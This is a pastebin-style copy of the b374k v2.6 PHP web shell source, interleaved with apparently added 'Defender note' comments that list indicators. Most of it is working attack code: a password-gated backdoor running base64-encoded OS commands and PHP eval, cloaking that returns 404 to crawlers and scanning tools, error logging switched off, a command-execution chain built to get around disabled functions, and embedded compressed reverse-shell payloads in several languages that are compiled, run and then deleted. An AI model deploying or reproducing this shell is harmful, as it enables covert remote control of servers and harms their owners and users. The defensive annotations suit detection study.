tvrock88

date

Sep 30th, 2017
  1. <?php
  2.  
  3. // b374k Shell v2.6 4m4t3r45u
  4. // Recoded By Andripzf
  5. // Jumping & Symlink Edition
  6.  
// Defender note: $s_pass holds a 32-character hex digest that gates the panel.
// The login code further down compares it with md5() of the submitted password
// and with the raw "b374k" cookie value. It is a fixed string inside the file,
// so it can be used as a content indicator when hunting for copies of this paste.
$s_pass = "8ea906d35b500aa4a7dd4583e4024c8f"; // T_T
$s_ver = "2.6";
// Title string; the s_pass request handler further down echoes it when neither
// 'cmd' nor 'eval' is supplied.
$s_title = "b374k ".$s_ver;
// Lifetime of the auth cookie in seconds (7 days).
$s_login_time = 3600 * 24 * 7;
// When false, the setup code that follows turns error reporting and logging off.
$s_debug = false;
  12.  
// Runtime setup: start output buffering, lift the execution time limit and
// clear the stat cache. Each call is @-silenced so a refused setting produces
// no warning.
@ob_start();
@set_time_limit(0);
@ini_set('html_errors','0');
@clearstatcache();
if($s_debug){
    error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
    @ini_set('display_errors','1');
    @ini_set('log_errors','1');
}
else{
    // Defender note: with $s_debug false the script asks PHP to stop both
    // displaying and logging errors for this request, so its own failures are
    // not expected to show up in the PHP error log. Triage should therefore
    // lean on web-server access logs and process telemetry instead.
    error_reporting(0);
    @ini_set('display_errors','0');
    @ini_set('log_errors','0');
}
  27.  
// Panel authentication. $s_auth ends up true when any of these holds:
//   - $s_pass is empty (final else branch: the panel is open to every visitor),
//   - the "b374k" cookie equals the stored digest,
//   - md5() of the 'login' request parameter equals the stored digest.
$s_auth = false;
if(strlen(trim($s_pass))>0){
    if(isset($_COOKIE['b374k'])){
        // Defender note: the cookie carries the digest itself, so its value is
        // static for every session of this copy. The cookie name "b374k" and
        // that value are usable as request-log / proxy-log indicators.
        // Comparison is the loose == operator on lower-cased, trimmed strings.
        if(strtolower(trim($s_pass)) == strtolower(trim($_COOKIE['b374k']))) $s_auth = true;
    }
    if(isset($_REQUEST['login'])){
        $s_login = strtolower(md5(trim($_REQUEST['login'])));
        if(strtolower(trim($s_pass)) == $s_login){
            // Cookie is set with name, value and expiry only; no path, domain
            // or flag arguments are passed.
            setcookie("b374k",$s_login,time() + $s_login_time);
            $s_auth = true;
        }
    }

    if(isset($_REQUEST['x']) && ($_REQUEST['x']=='logout')){
        // Cookies named "theme" and "cwd" survive logout; all others are expired.
        $persist = array("theme","cwd");
        // NOTE(review): the condition tests the b374k_included and s_home
        // cookies, but the value read is the s_self cookie - confirm which one
        // was intended. The result is used as the redirect target below.
        $s_reload = (isset($_COOKIE['b374k_included']) && isset($_COOKIE['s_home']))? rtrim(urldecode($_COOKIE['s_self']),"&"):"";
        foreach($_COOKIE as $s_k=>$s_v){
            // is_array() is applied to the cookie name ($s_k), not to its value.
            if(!in_array($s_k, $persist)) if(!is_array($s_k)) setcookie($s_k,"",time() - $s_login_time);
        }
        $s_auth = false;
        // Redirects to a URL taken from a request cookie.
        if(!empty($s_reload)) header("Location: ".$s_reload);
    }
}
else $s_auth = true;
  52.  
// Non-interactive command channel, independent of the cookie login above.
// Any request that carries a non-empty 's_pass' parameter ends in die(), so
// the HTML panel is never rendered for such requests.
//
// Defender note (indicators visible in this block):
//   - parameter names: s_pass, cmd, eval ($_REQUEST is read, so they are not
//     tied to one HTTP method),
//   - 'cmd' and 'eval' values are base64 text,
//   - the response body is exactly the title string ("b374k " + version) when
//     s_pass matches but no action parameter is present.
if(!empty($_REQUEST['s_pass'])){
    // The parameter is compared with the stored digest string directly; there
    // is no md5() step in this path.
    if(strtolower(trim($s_pass)) == strtolower(trim($_REQUEST['s_pass']))){
        if(isset($_REQUEST['cmd'])){
            // Decoded value is handed to exe(), i.e. run as an OS command.
            $s_cmd = base64_decode($_REQUEST['cmd']);
            echo exe($s_cmd);
        }
        elseif(isset($_REQUEST['eval'])){
            // Decoded value is executed as PHP; output is captured through a
            // nested output buffer and echoed back.
            $s_code = base64_decode($_REQUEST['eval']);
            ob_start();
            eval($s_code);
            $s_res = ob_get_contents();
            ob_end_clean();
            echo $s_res;
        }
        else echo $s_title;
    }
    // Reached for matching and non-matching s_pass alike: a wrong value yields
    // an empty response.
    die();
}
  71.  
// User-Agent cloaking: requests whose User-Agent matches the crawler / HTTP
// library pattern below, or that send no User-Agent at all, receive a 404
// status with an empty body.
//
// Defender note: a 404 returned to an automated client (the pattern covers
// wget, curl, python, java, libwww among others) is therefore not evidence
// that the file is absent - confirm on disk or with file-integrity tooling.
// This check sits after the s_pass handler above, so that handler answers
// regardless of User-Agent.
if(isset($_SERVER['HTTP_USER_AGENT']) && (preg_match('/bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww/i', $_SERVER['HTTP_USER_AGENT']))){
    header("HTTP/1.0 404 Not Found");
    header("Status: 404 Not Found");
    die();
}
elseif(!isset($_SERVER['HTTP_USER_AGENT'])){
    header("HTTP/1.0 404 Not Found");
    header("Status: 404 Not Found");
    die();
}
  82.  
  83. $s_rs_pl ="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";
  84. $s_rs_py = "lVRtT9swEP6c/IpgpmGrwaGFaVJZKiEIE9qAqu20D8Cq1LkmEalt2S6Ufz87SV9ATGiqWveee3vOd+f9vWipVTQreQT8KZAvphDc3w8KY6TuRxETGdBciLwCysQiktHs+OvJ46EuoKoiv1xIoUygINTLmVSCgdah0KF+sV/BHsGEplyAL2OE/ML9ZDAPamfMSN/3nE+89aVDIYFjFtYm8UQtbWSTiaV5ZXQ1TBwMSr0Hl/wtSnxPgVkqHjiUNhGpgjTDpLOGbLQdaCENJn5NN2WmFLzhW84DoSlPF7AXI26Qhbx5zOi8rIAL6+F5Vm/LN7DACFb19UyS0XW8MqAWp8NxNz74NPx9MTg4bbUWOq0boIvgsAy+fUYdbRSekw4KBrtCbyvZPFBpcNmfC5s6cDflJM+ol/r0lGWlgD3h7lHvxPHyYMVAmkYrU61rrI3iucpsCViRwVEDeLNYAdWQKlZgxLL7AN/9udcPHYJCFc6rNNfO4Or7ze0oOT8bJ6Rxs4FmbYT2umRqClrqrFR4RnMllhJ3CVnbuAtjxRtlq7ONAZ7hdT9aeEvaOrvRqOdJkZ2kSxOkPKsrsv9dTW0oJ/mbIEE7FpeplZpur3P1NzOD7jnqWJI5GPbsxgMNkJ/Htsk0VfmT395cTuK450Y6zu+6Dz5UO/jxFvcKe/ac3uaHVWlsuXY/Sm6wJL6Om7WhzYFb6exyenWTTNqdouPb8x/T8WSUnF1bF1uYcQohN/bj259TZ7TrMh0lv8bJ2cXFKLQZ35DW1E5ghjE6ovUHhdLdtqZVaUeZ4y+vPFw5btAC2znBOTCDcdF4bIfMLT7VFYB03pumvbdBnm6ag+rHpXkfgn7QxobMNsA1bdP3D8xRZ3dg2vXVxG/9HXP7xKQktg1kji7+F/HuR8TZ/xH/wPxd4oz4fwE=";
  85. $s_rs_rb = "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";
  86. $s_rs_js = "nVHLasMwEDwrkH8wvliGVIImUEjIqZ/QY/rAkTeWqCy5kpwUQv69kuykebSl2Afh3Zmd3Z2lNOHONXZOKdMlkErrSgJhuqYNXU8fZu93loOUdDzaFiaxTbFTyTIx8NEKAzhjXMjyrTGagbVZTiJh0ZEVuHOqD7O8h6wzUNTnaJc5EZhWVku4aNWlIqVXCZN5SkbXQlHLM4+IDe6nIY0s3EabmtSFYxzT151niTz/rmN1SeATQl3SSRam2nrkKBHCTjT8EQmqcny5nOb78QgFPvdkvxhhfnoHT2C2YPCmVcwJrbCNPGTJzggHOI2G9u3nYUcFzEH5rNKwVNJ/3WpeOJqJI/0ct5xYVwpFDNi2BpxfQ7p1xHdPy8IV6eQ4TYJDnO+P08RocbhVBmMGlv9Vdhz6php1LydSWAcqOr26fwnJw3gE0kJy7f/s5L+98P+xczRY36tM4kVX0yj330Og3y6AfrAeDfQcDTQbDXP58AU=";
  87. $s_rs_c = "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";
  88. $s_rs_java = "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";
  89. $s_rs_win = "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";
  90. $s_rs_php = "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";
  91. $s_favicon = "";
  92. $s_dark_cb = "";
  93. $s_bright_cb = "";
  94. $s_style = "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";
  95. $s_mime_types = "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";
  96. $s_sortable_js = "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";
  97.  
  98.  
// Render a path as a row of breadcrumb links.
//
// $s_p is split on DIRECTORY_SEPARATOR. For every element except the last one
// produced by explode(), an <a> is emitted whose href is the global $s_self
// followed by "cd=" and the path prefix up to and including that element.
// Returns the trimmed HTML fragment.
//
// NOTE(review): path components are concatenated into the markup without any
// escaping. $s_self is a global defined outside this excerpt.
function swd($s_p){
    global $s_self;
    $s_ps = explode(DIRECTORY_SEPARATOR,$s_p);
    $s_pu = "";
    for($s_i = 0 ; $s_i < sizeof($s_ps)-1 ; $s_i++){
        // Rebuild the prefix "comp0/comp1/.../comp_i/" for this link.
        $s_pz = "";
        for($s_j = 0 ; $s_j <= $s_i ; $s_j++) $s_pz .= $s_ps[$s_j].DIRECTORY_SEPARATOR;
        $s_pu .= "<a href='".$s_self."cd=".$s_pz."' onclick='return false;'>".$s_ps[$s_i]." ".DIRECTORY_SEPARATOR." </a>";
    }
    return trim($s_pu);
}
  110.  
  111. function hss($s_t){
  112. $s_n = array(">","<","\"");
  113. $s_y = array("&gt;", "&lt;", "&quot;");
  114. return str_replace($s_n,$s_y,$s_t);
  115. }
  116.  
  117. function pf($f){
  118. return "\"".$f."\"";
  119. }
  120.  
  121. function rp($s_t){
  122. return trim(str_replace("<br />","",$s_t));
  123. }
  124.  
  125. function cs($s_t){
  126. return str_replace(" ","_",$s_t);
  127. }
  128.  
// Normalise a request value: URL-decode it and trim whitespace; when
// magic_quotes_gpc is reported as on, strip the added backslashes first.
//
// NOTE(review): get_magic_quotes_gpc() was removed in PHP 8.0, so on PHP 8+
// calling this helper raises an undefined-function error.
function ss($s_t){
    return (!get_magic_quotes_gpc())? trim(urldecode($s_t)) : trim(urldecode(stripslashes($s_t)));
}
  132.  
// Same as ss() but without the urldecode() step: trim the value, stripping
// magic-quotes backslashes first when magic_quotes_gpc is reported as on.
//
// NOTE(review): get_magic_quotes_gpc() was removed in PHP 8.0, so on PHP 8+
// calling this helper raises an undefined-function error.
function ssc($s_t){
    return (!get_magic_quotes_gpc())? trim($s_t) : trim(stripslashes($s_t));
}
  136.  
// Unpack one of the embedded helper payloads, run it, then delete the files.
//
// $s_rstype   "<method>_<lang>"; only the <lang> part selects a branch here.
// $s_rstarget text appended to the command line as the helper's arguments
//             (concatenated as-is, no shell quoting).
// $s_rscode   payload as base64 over raw-deflate data - presumably one of the
//             $s_rs_* blobs defined earlier in the file; their content is
//             compressed and not readable on this page.
// Returns the captured output of the helper, or one of the error strings.
//
// Defender note (artefacts this function creates in the current working
// directory, all removed again at the end of the call):
//   b374k_rs.py / .pl / .rb / .js      script helpers
//   b374k_rs.c and b374k_rs            C source and compiled binary
//   b374k_rs.exe                       Windows helper
//   b374k_rs.java, b374k_rs.class, b374k_rs$pt.class
// Because the files are short-lived, process telemetry (the web-server account
// starting python, perl, ruby, node, gcc, javac, java or chmod) is the more
// durable signal than a file scan.
function rs($s_rstype,$s_rstarget,$s_rscode){
    $s_result = "";
    $s_fpath = "";
    $s_fc = gzinflate(base64_decode($s_rscode));

    $s_errperm = "Directory ".getcwd().DIRECTORY_SEPARATOR." is not writable, please change to a writable one";
    $s_errgcc = "Unable to compile using gcc";
    $s_errjavac = "Unable to compile using javac";

    $s_split = explode("_",$s_rstype);
    $s_method = $s_split[0]; // assigned but not read again inside this function
    $s_lang = $s_split[1];
    // Interpreted helpers: write the script, mark it executable, run it through
    // the matching interpreter.
    if($s_lang=="py" || $s_lang=="pl" || $s_lang=="rb" || $s_lang=="js"){
        if($s_lang=="py") $s_runlang = "python";
        elseif($s_lang=="pl") $s_runlang = "perl";
        elseif($s_lang=="rb") $s_runlang = "ruby";
        elseif($s_lang=="js") $s_runlang = "node";
        $s_fpath = "b374k_rs.".$s_lang;
        if(is_file($s_fpath)) unlink($s_fpath);
        if($s_file=fopen($s_fpath,"w")){
            fwrite($s_file,$s_fc);
            fclose($s_file);

            if(is_file($s_fpath)){
                // The chmod output is overwritten by the next assignment.
                $s_result = exe("chmod +x ".$s_fpath);
                $s_result = exe($s_runlang." ".$s_fpath." ".$s_rstarget);
            }
            else $s_result = $s_errperm;
        }
        else $s_result = $s_errperm;
    }
    // C helper: write the source, compile with gcc, run the binary.
    elseif($s_lang=="c"){
        $s_fpath = "b374k_rs";
        if(is_file($s_fpath)) unlink($s_fpath);
        if(is_file($s_fpath.".c")) unlink($s_fpath.".c");
        if($s_file=fopen($s_fpath.".c","w")){
            fwrite($s_file,$s_fc);
            fclose($s_file);
            if(is_file($s_fpath.".c")){
                $s_result = exe("gcc ".$s_fpath.".c -o ".$s_fpath);
                if(is_file($s_fpath)){
                    $s_result = exe("chmod +x ".$s_fpath);
                    $s_result = exe("./".$s_fpath." ".$s_rstarget);
                }
                else $s_result = $s_errgcc;
            }
            else $s_result = $s_errperm;
        }
        else $s_result = $s_errperm;
    }
    // Windows helper: the payload is written out as an .exe and started directly.
    elseif($s_lang=="win"){
        $s_fpath = "b374k_rs.exe";
        if(is_file($s_fpath)) unlink($s_fpath);
        if($s_file=fopen($s_fpath,"w")){
            fwrite($s_file,$s_fc);
            fclose($s_file);

            if(is_file($s_fpath)){
                $s_result = exe($s_fpath." ".$s_rstarget);
            }
            else $s_result = $s_errperm;
        }
        else $s_result = $s_errperm;
    }

    // Java helper: write the source, compile with javac, run the class.
    elseif($s_lang=="java"){
        $s_fpath = "b374k_rs";
        if(is_file($s_fpath.".java")) unlink($s_fpath.".java");
        if(is_file($s_fpath.".class")) unlink($s_fpath.".class");
        if($s_file=fopen($s_fpath.".java","w")){
            fwrite($s_file,$s_fc);
            fclose($s_file);


            if(is_file($s_fpath.".java")){
                $s_result = exe("javac ".$s_fpath.".java");
                if(is_file($s_fpath.".class")){
                    $s_result = exe("java ".$s_fpath." ".$s_rstarget);
                }
                else $s_result = $s_errjavac;
            }
            else $s_result = $s_errperm;
        }
        else $s_result = $s_errperm;
    }
    // PHP helper: evaluated inside the current PHP process; no file is written
    // and no child process is started by this branch itself.
    elseif($s_lang=="php"){
        $s_result = eval("?>".$s_fc);
    }
    // Cleanup of everything any branch may have dropped.
    if(is_file($s_fpath)) unlink($s_fpath);
    if(is_file($s_fpath.".c")) unlink($s_fpath.".c");
    if(is_file($s_fpath.".java")) unlink($s_fpath.".java");
    if(is_file($s_fpath.".class")) unlink($s_fpath.".class");
    if(is_file($s_fpath."\$pt.class")) unlink($s_fpath."\$pt.class");
    return $s_result;
}
  232.  
  233. function ts($s_s){
  234. if($s_s<=0) return 0;
  235. $s_w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
  236. $s_e = floor(log($s_s)/log(1024));
  237. return sprintf('%.2f '.$s_w[$s_e], ($s_s/pow(1024, floor($s_e))));
  238. }
  239.  
// Human-readable size of a file.
// Returns 0 for an empty file, the ts() string otherwise, and "???" when
// filesize() fails (the warning is suppressed with @).
function gs($s_f){
    $s_s = @filesize($s_f);
    if($s_s !== false){
        if($s_s<=0) return 0;
        return ts($s_s);
    }
    else return "???";
}
  248.  
  249. function gp($s_f){
  250. if($s_m=@fileperms($s_f)){
  251. $s_p = 'u';
  252. if(($s_m & 0xC000) == 0xC000)$s_p = 's';
  253. elseif(($s_m & 0xA000) == 0xA000)$s_p = 'l';
  254. elseif(($s_m & 0x8000) == 0x8000)$s_p = '-';
  255. elseif(($s_m & 0x6000) == 0x6000)$s_p = 'b';
  256. elseif(($s_m & 0x4000) == 0x4000)$s_p = 'd';
  257. elseif(($s_m & 0x2000) == 0x2000)$s_p = 'c';
  258. elseif(($s_m & 0x1000) == 0x1000)$s_p = 'p';
  259. $s_p .= ($s_m & 00400) ? 'r' : '-';
  260. $s_p .= ($s_m & 00200) ? 'w' : '-';
  261. $s_p .= ($s_m & 00100) ? 'x' : '-';
  262. $s_p .= ($s_m & 00040) ? 'r' : '-';
  263. $s_p .= ($s_m & 00020) ? 'w' : '-';
  264. $s_p .= ($s_m & 00010) ? 'x' : '-';
  265. $s_p .= ($s_m & 00004) ? 'r' : '-';
  266. $s_p .= ($s_m & 00002) ? 'w' : '-';
  267. $s_p .= ($s_m & 00001) ? 'x' : '-';
  268. return $s_p;
  269. }
  270. else return "???????????";
  271. }
  272.  
// Run an OS command and return its combined output as a string ("" when
// nothing produced output).
//
// " 2>&1" is appended so stderr is folded into stdout. Six PHP process
// functions are tried in a fixed order - system, shell_exec, exec, passthru,
// proc_open, popen - each guarded by is_callable(), presumably to skip
// functions that the host has disabled. The first one that yields non-empty
// output ends the search.
//
// Defender note:
//   - A host that restricts only some of these functions is still usable by
//     this chain; a disable_functions policy has to cover all six to stop it.
//   - A command that runs but prints nothing falls through to the next
//     function, so a single request may start the same command several times.
//   - Every call is @-silenced, and error logging was switched off earlier in
//     the file, so failures are not expected in the PHP error log. Child
//     processes of the web-server account remain visible to process auditing.
function exe($s_c){
    $s_out = "";
    $s_c = $s_c." 2>&1";

    // system() prints directly, so its output is captured with a nested buffer.
    if(is_callable('system')) {
        ob_start();
        @system($s_c);
        $s_out = ob_get_contents();
        ob_end_clean();
        if(!empty($s_out)) return $s_out;
    }
    if(is_callable('shell_exec')){
        $s_out = @shell_exec($s_c);
        if(!empty($s_out)) return $s_out;
    }
    if(is_callable('exec')) {
        @exec($s_c,$s_r);
        // Output lines are joined without any separator between them.
        if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s;
        if(!empty($s_out)) return $s_out;
    }
    if(is_callable('passthru')) {
        ob_start();
        @passthru($s_c);
        $s_out = ob_get_contents();
        ob_end_clean();
        if(!empty($s_out)) return $s_out;
    }
    if(is_callable('proc_open')) {
        $s_descriptorspec = array(
            0 => array("pipe", "r"),
            1 => array("pipe", "w"),
            2 => array("pipe", "w")
        );
        // Started in the current working directory with an empty environment array.
        $s_proc = @proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array());
        if (is_resource($s_proc)) {
            // stdout is drained first, then stderr; the pipes are not closed explicitly.
            while ($s_si = fgets($s_pipes[1])) {
                if(!empty($s_si)) $s_out .= $s_si;
            }
            while ($s_se = fgets($s_pipes[2])) {
                if(!empty($s_se)) $s_out .= $s_se;
            }
        }
        @proc_close($s_proc);
        if(!empty($s_out)) return $s_out;
    }
    if(is_callable('popen')){
        $s_f = @popen($s_c, 'r');
        if($s_f){
            while(!feof($s_f)){
                $s_out .= fread($s_f, 2096);
            }
            pclose($s_f);
        }
        if(!empty($s_out)) return $s_out;
    }
    return "";
}
  330.  
  331. function cp($s_p){
  332. if(is_dir($s_p)){
  333. $s_x = DIRECTORY_SEPARATOR;
  334. while(substr($s_p,-1) == $s_x) $s_p = rtrim($s_p,$s_x);
  335. return $s_p.$s_x;
